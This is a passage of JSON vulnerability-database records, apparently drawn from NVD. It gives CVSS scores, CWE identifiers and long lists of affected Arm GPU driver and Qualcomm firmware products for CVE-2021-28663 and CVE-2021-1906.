"LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T15:15:00", "type": "cve", "title": "CVE-2021-28663", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28663"], "modified": "2023-02-23T22:15:00", "cpe": ["cpe:/a:arm:bifrost_gpu_kernel_driver:r28p0", "cpe:/a:arm:midguard_gpu_kernel_driver:r30p0", "cpe:/a:arm:valhall_gpu_kernel_driver:r28p0"], "id": "CVE-2021-28663", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28663", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:arm:bifrost_gpu_kernel_driver:r28p0:*:*:*:*:*:*:*", "cpe:2.3:a:arm:midguard_gpu_kernel_driver:r30p0:*:*:*:*:*:*:*", "cpe:2.3:a:arm:valhall_gpu_kernel_driver:r28p0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:14:59", "description": "Improper handling of address deregistration on failure can lead to new GPU address allocation failure. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-07T09:15:00", "type": "cve", "title": "CVE-2021-1906", "cwe": ["CWE-755"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1906"], "modified": "2021-05-12T15:23:00", "cpe": ["cpe:/o:qualcomm:qca6595au_firmware:-", "cpe:/o:qualcomm:wcn6740_firmware:-", "cpe:/o:qualcomm:qsw8574_firmware:-", "cpe:/o:qualcomm:pm855_firmware:-", "cpe:/o:qualcomm:qdm5652_firmware:-", "cpe:/o:qualcomm:qualcomm215_firmware:-", "cpe:/o:qualcomm:sa6155p_firmware:-", "cpe:/o:qualcomm:sd210_firmware:-", "cpe:/o:qualcomm:sd768g_firmware:-", "cpe:/o:qualcomm:qpm8895_firmware:-", "cpe:/o:qualcomm:pmi8952_firmware:-", "cpe:/o:qualcomm:qbt2000_firmware:-", "cpe:/o:qualcomm:pm8150a_firmware:-", "cpe:/o:qualcomm:qdm5677_firmware:-", "cpe:/o:qualcomm:mdm9206_firmware:-", "cpe:/o:qualcomm:sdr660_firmware:-", "cpe:/o:qualcomm:qdm2307_firmware:-", "cpe:/o:qualcomm:apq8096au_firmware:-", "cpe:/o:qualcomm:qdm5679_firmware:-", "cpe:/o:qualcomm:wcn6851_firmware:-", "cpe:/o:qualcomm:pm670a_firmware:-", "cpe:/o:qualcomm:sm7350_firmware:-", "cpe:/o:qualcomm:wsa8815_firmware:-", "cpe:/o:qualcomm:wcd9326_firmware:-", "cpe:/o:qualcomm:csra6620_firmware:-", "cpe:/o:qualcomm:qca6320_firmware:-", "cpe:/o:qualcomm:qpm4650_firmware:-", "cpe:/o:qualcomm:qca6696_firmware:-", "cpe:/o:qualcomm:pmk8350_firmware:-", "cpe:/o:qualcomm:wcn3950_firmware:-", "cpe:/o:qualcomm:qcs610_firmware:-", "cpe:/o:qualcomm:qdm3302_firmware:-", "cpe:/o:qualcomm:pm6125_firmware:-", "cpe:/o:qualcomm:qcs6125_firmware:-", "cpe:/o:qualcomm:qca6574au_firmware:-", "cpe:/o:qualcomm:smb358s_firmware:-", "cpe:/o:qualcomm:qfs2580_firmware:-", "cpe:/o:qualcomm:qpm6582_firmware:-", "cpe:/o:qualcomm:pmc1000h_firmware:-", "cpe:/o:qualcomm:qat5568_firmware:-", "cpe:/o:qualcomm:qcs605_firmware:-", "cpe:/o:qualcomm:wcn3991_firmware:-", "cpe:/o:qualcomm:sd205_firmware:-", "cpe:/o:qualcomm:sda429w_firmware:-", "cpe:/o:qualcomm:qat3522_firmware:-", "cpe:/o:qualcomm:pm6250_firmware:-", "cpe:/o:qualcomm:pm8004_firmware:-", "cpe:/o:qualcomm:rgr7640au_firmware:-", "cpe:/o:qualcomm:qfe4301_firmware:-", "cpe:/o:qualcomm:msm8996au_firmware:-", "cpe:/o:qualcomm:sdx55_firmware:-", "cpe:/o:qualcomm:pm670_firmware:-", "cpe:/o:qualcomm:qpa4361_firmware:-", "cpe:/o:qualcomm:qtc801s_firmware:-", "cpe:/o:qualcomm:qfe4309_firmware:-", "cpe:/o:qualcomm:wcd9330_firmware:-", "cpe:/o:qualcomm:qat5516_firmware:-", "cpe:/o:qualcomm:fsm10056_firmware:-", "cpe:/o:qualcomm:pm7150a_firmware:-", "cpe:/o:qualcomm:qln5020_firmware:-", "cpe:/o:qualcomm:sdx20_firmware:-", "cpe:/o:qualcomm:wcn3615_firmware:-", "cpe:/o:qualcomm:smb1381_firmware:-", "cpe:/o:qualcomm:wcd9340_firmware:-", "cpe:/o:qualcomm:apq8053_firmware:-", "cpe:/o:qualcomm:smb1350_firmware:-", "cpe:/o:qualcomm:qpm5641_firmware:-", "cpe:/o:qualcomm:sd730_firmware:-", "cpe:/o:qualcomm:qdm5579_firmware:-", "cpe:/o:qualcomm:qpm8820_firmware:-", "cpe:/o:qualcomm:sd720g_firmware:-", "cpe:/o:qualcomm:pm8937_firmware:-", "cpe:/o:qualcomm:pm8953_firmware:-", "cpe:/o:qualcomm:smb2351_firmware:-", "cpe:/o:qualcomm:qpa8673_firmware:-", "cpe:/o:qualcomm:qpm6621_firmware:-", "cpe:/o:qualcomm:wsa8830_firmware:-", "cpe:/o:qualcomm:pmi8998_firmware:-", "cpe:/o:qualcomm:sdr051_firmware:-", "cpe:/o:qualcomm:sd670_firmware:-", "cpe:/o:qualcomm:wtr2955_firmware:-", "cpe:/o:qualcomm:wcn3680_firmware:-", "cpe:/o:qualcomm:pmd9607_firmware:-", "cpe:/o:qualcomm:qfe4302_firmware:-", "cpe:/o:qualcomm:qln5040_firmware:-", "cpe:/o:qualcomm:qpa8821_firmware:-", "cpe:/o:qualcomm:qca6174a_firmware:-", "cpe:/o:qualcomm:pmm8155au_firmware:-", "cpe:/o:qualcomm:qtc800h_firmware:-", "cpe:/o:qualcomm:mdm9150_firmware:-", "cpe:/o:qualcomm:qfs2608_firmware:-", "cpe:/o:qualcomm:rsw8577_firmware:-", "cpe:/o:qualcomm:sdr8250_firmware:-", "cpe:/o:qualcomm:qfe4373fc_firmware:-", "cpe:/o:qualcomm:ar8035_firmware:-", "cpe:/o:qualcomm:pm7250b_firmware:-", "cpe:/o:qualcomm:qca6335_firmware:-", "cpe:/o:qualcomm:sd710_firmware:-", "cpe:/o:qualcomm:pmx20_firmware:-", "cpe:/o:qualcomm:qet4101_firmware:-", "cpe:/o:qualcomm:qpm4630_firmware:-", "cpe:/o:qualcomm:sd845_firmware:-", "cpe:/o:qualcomm:sd632_firmware:-", "cpe:/o:qualcomm:qln1021aq_firmware:-", "cpe:/o:qualcomm:qpa6560_firmware:-", "cpe:/o:qualcomm:qpm5541_firmware:-", "cpe:/o:qualcomm:qdm2305_firmware:-", "cpe:/o:qualcomm:qpm5579_firmware:-", "cpe:/o:qualcomm:qpa5460_firmware:-", "cpe:/o:qualcomm:qpa8803_firmware:-", "cpe:/o:qualcomm:sdr8150_firmware:-", "cpe:/o:qualcomm:qfs2530_firmware:-", "cpe:/o:qualcomm:qpm6670_firmware:-", "cpe:/o:qualcomm:qpa5580_firmware:-", "cpe:/o:qualcomm:pm8350b_firmware:-", "cpe:/o:qualcomm:pmi632_firmware:-", "cpe:/o:qualcomm:qpm5870_firmware:-", "cpe:/o:qualcomm:smb1355_firmware:-", "cpe:/o:qualcomm:pm4125_firmware:-", "cpe:/o:qualcomm:aqt1000_firmware:-", "cpe:/o:qualcomm:pm8998_firmware:-", "cpe:/o:qualcomm:sm6250p_firmware:-", "cpe:/o:qualcomm:qat5515_firmware:-", "cpe:/o:qualcomm:qpm5577_firmware:-", "cpe:/o:qualcomm:sd678_firmware:-", "cpe:/o:qualcomm:pm7250_firmware:-", "cpe:/o:qualcomm:csrb31024_firmware:-", "cpe:/o:qualcomm:sa8150p_firmware:-", "cpe:/o:qualcomm:pm8350bhs_firmware:-", "cpe:/o:qualcomm:qfs2630_firmware:-", "cpe:/o:qualcomm:qca6436_firmware:-", "cpe:/o:qualcomm:qpm4641_firmware:-", "cpe:/o:qualcomm:smb231_firmware:-", "cpe:/o:qualcomm:qdm3301_firmware:-", "cpe:/o:qualcomm:sd429_firmware:-", "cpe:/o:qualcomm:pmr735b_firmware:-", "cpe:/o:qualcomm:sd750g_firmware:-", "cpe:/o:qualcomm:pmk7350_firmware:-", "cpe:/o:qualcomm:wcn3620_firmware:-", "cpe:/o:qualcomm:sd460_firmware:-", "cpe:/o:qualcomm:sa8155_firmware:-", "cpe:/o:qualcomm:wcn3660_firmware:-", "cpe:/o:qualcomm:sdxr1_firmware:-", "cpe:/o:qualcomm:wtr6955_firmware:-", "cpe:/o:qualcomm:pmd9655_firmware:-", "cpe:/o:qualcomm:wcn3660b_firmware:-", "cpe:/o:qualcomm:qln1020_firmware:-", "cpe:/o:qualcomm:qtc800t_firmware:-", "cpe:/o:qualcomm:qpm5679_firmware:-", "cpe:/o:qualcomm:sdr675_firmware:-", "cpe:/o:qualcomm:csra6640_firmware:-", "cpe:/o:qualcomm:pmm8996au_firmware:-", "cpe:/o:qualcomm:pm8350bh_firmware:-", "cpe:/o:qualcomm:wcd9375_firmware:-", "cpe:/o:qualcomm:qat3550_firmware:-", "cpe:/o:qualcomm:sd8c_firmware:-", "cpe:/o:qualcomm:pme605_firmware:-", "cpe:/o:qualcomm:pm8350_firmware:-", "cpe:/o:qualcomm:qat5533_firmware:-", "cpe:/o:qualcomm:sd662_firmware:-", "cpe:/o:qualcomm:sd870_firmware:-", "cpe:/o:qualcomm:smb1396_firmware:-", "cpe:/o:qualcomm:pm855b_firmware:-", "cpe:/o:qualcomm:qat5522_firmware:-", "cpe:/o:qualcomm:smb1394_firmware:-", "cpe:/o:qualcomm:sa415m_firmware:-", "cpe:/o:qualcomm:wcn6856_firmware:-", "cpe:/o:qualcomm:qpa5373_firmware:-", "cpe:/o:qualcomm:sa6150p_firmware:-", "cpe:/o:qualcomm:qpa8802_firmware:-", "cpe:/o:qualcomm:qtm525_firmware:-", "cpe:/o:qualcomm:pmr735a_firmware:-", "cpe:/o:qualcomm:qca8337_firmware:-", "cpe:/o:qualcomm:qfe4308_firmware:-", "cpe:/o:qualcomm:qca6310_firmware:-", "cpe:/o:qualcomm:qat3516_firmware:-", "cpe:/o:qualcomm:qca6564_firmware:-", "cpe:/o:qualcomm:qfe4305_firmware:-", "cpe:/o:qualcomm:qpm5621_firmware:-", "cpe:/o:qualcomm:pm8909_firmware:-", "cpe:/o:qualcomm:qpm8870_firmware:-", "cpe:/o:qualcomm:qdm2308_firmware:-", "cpe:/o:qualcomm:smr545_firmware:-", "cpe:/o:qualcomm:qtm527_firmware:-", "cpe:/o:qualcomm:sdr660g_firmware:-", "cpe:/o:qualcomm:qpa8842_firmware:-", "cpe:/o:qualcomm:wcn3610_firmware:-", "cpe:/o:qualcomm:qcs603_firmware:-", "cpe:/o:qualcomm:qln1030_firmware:-", "cpe:/o:qualcomm:qcs410_firmware:-", "cpe:/o:qualcomm:sa6155_firmware:-", "cpe:/o:qualcomm:pm660l_firmware:-", "cpe:/o:qualcomm:pm660_firmware:-", "cpe:/o:qualcomm:qpa8801_firmware:-", "cpe:/o:qualcomm:wcd9380_firmware:-", "cpe:/o:qualcomm:pmm855au_firmware:-", "cpe:/o:qualcomm:qpa2625_firmware:-", "cpe:/o:qualcomm:pmm6155au_firmware:-", "cpe:/o:qualcomm:qca6564au_firmware:-", "cpe:/o:qualcomm:sd8885g_firmware:-", "cpe:/o:qualcomm:wtr4905_firmware:-", "cpe:/o:qualcomm:qtc410s_firmware:-", "cpe:/o:qualcomm:qat3514_firmware:-", "cpe:/o:qualcomm:qpm2630_firmware:-", "cpe:/o:qualcomm:pm8150c_firmware:-", "cpe:/o:qualcomm:qpa5581_firmware:-", "cpe:/o:qualcomm:pm456_firmware:-", "cpe:/o:qualcomm:qdm5620_firmware:-", "cpe:/o:qualcomm:qfe2550_firmware:-", "cpe:/o:qualcomm:pm660a_firmware:-", "cpe:/o:qualcomm:pm670l_firmware:-", "cpe:/o:qualcomm:wgr7640_firmware:-", "cpe:/o:qualcomm:qdm2310_firmware:-", "cpe:/o:qualcomm:wcd9370_firmware:-", "cpe:/o:qualcomm:qtc800s_firmware:-", "cpe:/o:qualcomm:sd439_firmware:-", "cpe:/o:qualcomm:smb1357_firmware:-", "cpe:/o:qualcomm:wcd9385_firmware:-", "cpe:/o:qualcomm:qpm6585_firmware:-", "cpe:/o:qualcomm:pmi8937_firmware:-", "cpe:/o:qualcomm:smb1398_firmware:-", "cpe:/o:qualcomm:qet5100m_firmware:-", "cpe:/o:qualcomm:smb1390_firmware:-", "cpe:/o:qualcomm:smb1351_firmware:-", "cpe:/o:qualcomm:qdm2301_firmware:-", "cpe:/o:qualcomm:pm8150b_firmware:-", "cpe:/o:qualcomm:qpm5875_firmware:-", "cpe:/o:qualcomm:pmx50_firmware:-", "cpe:/o:qualcomm:sdxr25g_firmware:-", "cpe:/o:qualcomm:sd8cx_firmware:-", "cpe:/o:qualcomm:pmx24_firmware:-", "cpe:/o:qualcomm:pmm8195au_firmware:-", "cpe:/o:qualcomm:wtr2965_firmware:-", "cpe:/o:qualcomm:apq8017_firmware:-", "cpe:/o:qualcomm:pm8350c_firmware:-", "cpe:/o:qualcomm:pm855a_firmware:-", "cpe:/o:qualcomm:smr526_firmware:-", "cpe:/o:qualcomm:qca6584au_firmware:-", "cpe:/o:qualcomm:sd675_firmware:-", "cpe:/o:qualcomm:qpm5657_firmware:-", "cpe:/o:qualcomm:fsm10055_firmware:-", "cpe:/o:qualcomm:pm855p_firmware:-", "cpe:/o:qualcomm:qcm4290_firmware:-", "cpe:/o:qualcomm:apq8009_firmware:-", "cpe:/o:qualcomm:qca9367_firmware:-", "cpe:/o:qualcomm:qet6110_firmware:-", "cpe:/o:qualcomm:qcm6125_firmware:-", "cpe:/o:qualcomm:pm8250_firmware:-", "cpe:/o:qualcomm:sdx50m_firmware:-", "cpe:/o:qualcomm:qca6420_firmware:-", "cpe:/o:qualcomm:sd765_firmware:-", "cpe:/o:qualcomm:qsw8573_firmware:-", "cpe:/o:qualcomm:wcd9341_firmware:-", "cpe:/o:qualcomm:sdm830_firmware:-", "cpe:/o:qualcomm:qfe4320_firmware:-", "cpe:/o:qualcomm:wsa8810_firmware:-", "cpe:/o:qualcomm:qat3518_firmware:-", "cpe:/o:qualcomm:pm6150l_firmware:-", "cpe:/o:qualcomm:pmk8003_firmware:-", "cpe:/o:qualcomm:qcs4290_firmware:-", "cpe:/o:qualcomm:qat3555_firmware:-", "cpe:/o:qualcomm:qet6100_firmware:-", "cpe:/o:qualcomm:mdm9650_firmware:-", "cpe:/o:qualcomm:qpm5670_firmware:-", "cpe:/o:qualcomm:qca9377_firmware:-", "cpe:/o:qualcomm:qfe4303_firmware:-", "cpe:/o:qualcomm:qca6564a_firmware:-", "cpe:/o:qualcomm:qdm5650_firmware:-", "cpe:/o:qualcomm:qdm5670_firmware:-", "cpe:/o:qualcomm:mdm9626_firmware:-", "cpe:/o:qualcomm:smr546_firmware:-", "cpe:/o:qualcomm:sd450_firmware:-", "cpe:/o:qualcomm:qpm4640_firmware:-", "cpe:/o:qualcomm:qet4100_firmware:-", "cpe:/o:qualcomm:wcn3990_firmware:-", "cpe:/o:qualcomm:sd835_firmware:-", "cpe:/o:qualcomm:wsa8835_firmware:-", "cpe:/o:qualcomm:mdm9250_firmware:-", "cpe:/o:qualcomm:smb1380_firmware:-", "cpe:/o:qualcomm:sdw3100_firmware:-", "cpe:/o:qualcomm:sd480_firmware:-", "cpe:/o:qualcomm:wcn3998_firmware:-", "cpe:/o:qualcomm:qdm4643_firmware:-", "cpe:/o:qualcomm:sa8155p_firmware:-", "cpe:/o:qualcomm:sdm630_firmware:-", "cpe:/o:qualcomm:qpa5461_firmware:-", "cpe:/o:qualcomm:qca6430_firmware:-", "cpe:/o:qualcomm:sdr052_firmware:-", "cpe:/o:qualcomm:sdr735_firmware:-", "cpe:/o:qualcomm:qpa8686_firmware:-", "cpe:/o:qualcomm:qdm4650_firmware:-", "cpe:/o:qualcomm:apq8064au_firmware:-", "cpe:/o:qualcomm:wcd9360_firmware:-", "cpe:/o:qualcomm:sdr735g_firmware:-", "cpe:/o:qualcomm:wtr5975_firmware:-", "cpe:/o:qualcomm:qdm5671_firmware:-", "cpe:/o:qualcomm:smb1358_firmware:-", "cpe:/o:qualcomm:wcn6855_firmware:-", "cpe:/o:qualcomm:qat3519_firmware:-", "cpe:/o:qualcomm:qsm7250_firmware:-", "cpe:/o:qualcomm:pmx55_firmware:-", "cpe:/o:qualcomm:pm6350_firmware:-", "cpe:/o:qualcomm:qpm5620_firmware:-", "cpe:/o:qualcomm:sa8195p_firmware:-", "cpe:/o:qualcomm:sdr425_firmware:-", "cpe:/o:qualcomm:qpm8830_firmware:-", "cpe:/o:qualcomm:wcd9335_firmware:-", "cpe:/o:qualcomm:qdm2302_firmware:-", "cpe:/o:qualcomm:qcs2290_firmware:-", "cpe:/o:qualcomm:qbt1500_firmware:-", "cpe:/o:qualcomm:pm640a_firmware:-", "cpe:/o:qualcomm:pm3003a_firmware:-", "cpe:/o:qualcomm:sd888_firmware:-", "cpe:/o:qualcomm:wcn3999_firmware:-", "cpe:/o:qualcomm:ar8151_firmware:-", "cpe:/o:qualcomm:sdx24_firmware:-", "cpe:/o:qualcomm:sm4125_firmware:-", "cpe:/o:qualcomm:pm8005_firmware:-", "cpe:/o:qualcomm:sd636_firmware:-", "cpe:/o:qualcomm:qpa4360_firmware:-", "cpe:/o:qualcomm:sa2150p_firmware:-", "cpe:/o:qualcomm:sdm429w_firmware:-", "cpe:/o:qualcomm:sdr865_firmware:-", "cpe:/o:qualcomm:qet6105_firmware:-", "cpe:/o:qualcomm:qfe2520_firmware:-", "cpe:/o:qualcomm:wtr3925_firmware:-", "cpe:/o:qualcomm:sm6250_firmware:-", "cpe:/o:qualcomm:qcm2290_firmware:-", "cpe:/o:qualcomm:pmd9655au_firmware:-", "cpe:/o:qualcomm:sd765g_firmware:-", "cpe:/o:qualcomm:sd855_firmware:-", "cpe:/o:qualcomm:sd455_firmware:-", "cpe:/o:qualcomm:qca6390_firmware:-", "cpe:/o:qualcomm:qfe3340_firmware:-", "cpe:/o:qualcomm:msm8909w_firmware:-", "cpe:/o:qualcomm:qln1031_firmware:-", "cpe:/o:qualcomm:pm8150l_firmware:-", "cpe:/o:qualcomm:sm7250p_firmware:-", "cpe:/o:qualcomm:wcn3988_firmware:-", "cpe:/o:qualcomm:pm7350c_firmware:-", "cpe:/o:qualcomm:pm7150l_firmware:-", "cpe:/o:qualcomm:pm4250_firmware:-", "cpe:/o:qualcomm:qbt1000_firmware:-", "cpe:/o:qualcomm:sdx20m_firmware:-", "cpe:/o:qualcomm:pm439_firmware:-", "cpe:/o:qualcomm:pm855l_firmware:-", "cpe:/o:qualcomm:qpa4340_firmware:-", "cpe:/o:qualcomm:qfe2101_firmware:-", "cpe:/o:qualcomm:pm8009_firmware:-", "cpe:/o:qualcomm:sa515m_firmware:-", "cpe:/o:qualcomm:qdm5621_firmware:-", "cpe:/o:qualcomm:mdm9628_firmware:-", "cpe:/o:qualcomm:msm8953_firmware:-", "cpe:/o:qualcomm:smb1354_firmware:-", "cpe:/o:qualcomm:qpm6375_firmware:-", "cpe:/o:qualcomm:smr525_firmware:-", "cpe:/o:qualcomm:sd8655g_firmware:-", "cpe:/o:qualcomm:wcd9371_firmware:-", "cpe:/o:qualcomm:smb1395_firmware:-", "cpe:/o:qualcomm:qca6391_firmware:-", "cpe:/o:qualcomm:sd665_firmware:-", "cpe:/o:qualcomm:sd660_firmware:-", "cpe:/o:qualcomm:qln1036aq_firmware:-", "cpe:/o:qualcomm:qln4650_firmware:-", "cpe:/o:qualcomm:sd6905g_firmware:-", "cpe:/o:qualcomm:qln4640_firmware:-", "cpe:/o:qualcomm:qet5100_firmware:-", "cpe:/o:qualcomm:wcn3680b_firmware:-", "cpe:/o:qualcomm:qsw6310_firmware:-", "cpe:/o:qualcomm:pm6150_firmware:-", "cpe:/o:qualcomm:qpm5658_firmware:-", "cpe:/o:qualcomm:pmk8002_firmware:-", "cpe:/o:qualcomm:apq8009w_firmware:-", "cpe:/o:qualcomm:sdx55m_firmware:-", "cpe:/o:qualcomm:pm8150_firmware:-", "cpe:/o:qualcomm:qpm6325_firmware:-", "cpe:/o:qualcomm:wcn3980_firmware:-", "cpe:/o:qualcomm:pm640p_firmware:-", "cpe:/o:qualcomm:sa6145p_firmware:-", "cpe:/o:qualcomm:pm215_firmware:-", "cpe:/o:qualcomm:qpm5677_firmware:-", "cpe:/o:qualcomm:pm8008_firmware:-", "cpe:/o:qualcomm:qca6574a_firmware:-", "cpe:/o:qualcomm:qca6574_firmware:-", "cpe:/o:qualcomm:qln4642_firmware:-", "cpe:/o:qualcomm:pmr525_firmware:-", "cpe:/o:qualcomm:qln5030_firmware:-", "cpe:/o:qualcomm:ar8031_firmware:-", "cpe:/o:qualcomm:smb1360_firmware:-", "cpe:/o:qualcomm:msm8917_firmware:-", "cpe:/o:qualcomm:qpa8675_firmware:-", "cpe:/o:qualcomm:mdm9607_firmware:-", "cpe:/o:qualcomm:pm640l_firmware:-", "cpe:/o:qualcomm:pm6150a_firmware:-", "cpe:/o:qualcomm:qcs405_firmware:-", "cpe:/o:qualcomm:wcn6850_firmware:-", "cpe:/o:qualcomm:qpm4621_firmware:-", "cpe:/o:qualcomm:qca6426_firmware:-", "cpe:/o:qualcomm:wcn3910_firmware:-", "cpe:/o:qualcomm:pm8916_firmware:-"], "id": "CVE-2021-1906", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1906", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:qualcomm:wcn3680_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5581_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4308_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8053_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd210_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6420_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2520_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9370_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6110_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb2351_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa6560_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx24_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd636_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmd9655_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9380_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm4643_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1021aq_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9335_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8cx_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2530_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw8573_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd480_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:rsw8577_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6174a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5516_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1395_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr425_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3518_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs610_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5657_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1031_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm6250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7350c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6155p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8195p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr546_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8035_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdxr25g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5541_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx20m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs4290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9371_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs2290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3990_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4373fc_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4642_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa415m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8821_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8005_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5579_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4320_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800h_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5373_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx55_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc801s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csrb31024_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8937_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1380_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx55_firmware:-:*:*:*:*:*:*:*", 